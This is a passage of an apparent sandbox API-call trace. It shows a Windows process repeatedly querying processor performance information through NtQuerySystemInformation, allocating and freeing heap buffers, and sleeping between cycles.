[0188.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.862] Sleep (dwMilliseconds=0x110) [0188.899] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.899] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.899] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.900] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.900] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.900] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.901] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.901] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.901] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.902] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.902] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.902] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.908] Sleep (dwMilliseconds=0x110) [0188.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.926] Sleep (dwMilliseconds=0x110) [0188.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.973] Sleep (dwMilliseconds=0x110) [0189.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.272] Sleep (dwMilliseconds=0x110) [0189.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.319] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.320] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.320] Sleep (dwMilliseconds=0x110) [0189.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.332] Sleep (dwMilliseconds=0x110) [0189.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.379] Sleep (dwMilliseconds=0x110) [0189.427] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.427] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.428] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.432] Sleep (dwMilliseconds=0x110) [0189.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.475] Sleep (dwMilliseconds=0x110) [0189.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.525] Sleep (dwMilliseconds=0x110) [0189.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.533] Sleep (dwMilliseconds=0x110) [0189.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.565] Sleep (dwMilliseconds=0x110) [0189.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.725] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.726] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.726] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.726] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.727] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0189.727] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.728] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.728] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0189.728] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0189.729] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.729] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0189.730] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.730] Sleep (dwMilliseconds=0x110) [0189.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0189.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0189.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0189.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0189.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, 